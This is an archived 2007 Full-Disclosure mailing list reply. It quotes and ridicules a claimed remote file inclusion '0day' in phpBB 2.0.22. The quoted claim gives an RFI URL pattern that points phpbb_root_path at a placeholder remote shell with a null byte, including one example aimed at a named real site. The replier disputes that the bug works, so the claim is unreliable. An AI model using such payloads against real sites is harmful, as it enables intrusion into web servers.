| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 02 Jun 2007 04:14:19 -0400 From: <hardened-php@...hmail.com> To: <full-disclosure@...ts.grok.org.uk> Cc: Subject: Re: 0DAY RFI in phpBB <= 2.0.22 HOT -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 "New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week: victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.sh ell]%00 For example: http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[rem ote.shell]%00 Enjoy :) BUG BY REZEN! XORCREW! H4X H4X!" Did you even read the code rezen? test your "vuln"? How about you test what you find instead of posting everything you see to the list and trying to get attention/fame? Leave vuln assessment/code auditing to people who actually care about it, and stop playing as one. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkZhJdIACgkQMe2+mPigEXJ5awP+Iqd9pRIypATEnM1K7ZhpAjxPgJeY NedFd4Dkf6EgeQFy0zY2qGHM24CrbHO27bfsM2tRbUIdxUbGjD+f5pQ1hGjEF0Mg6Jw0 cBoER8jhWMiZZRxlseaKtkL7t8iF4DsZq5OIdrbHEm4oGpudHE0FKpJFyLsR8Tk85ziA Icd6qcQ= =Rhg/ -----END PGP SIGNATURE----- -- Prices, software, charts & analysis. Click here to open your online FX trading account. http://tagline.hushmail.com/fc/CAaCXv1QmGxJYt2brAIxTpm5SofhvHbE/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists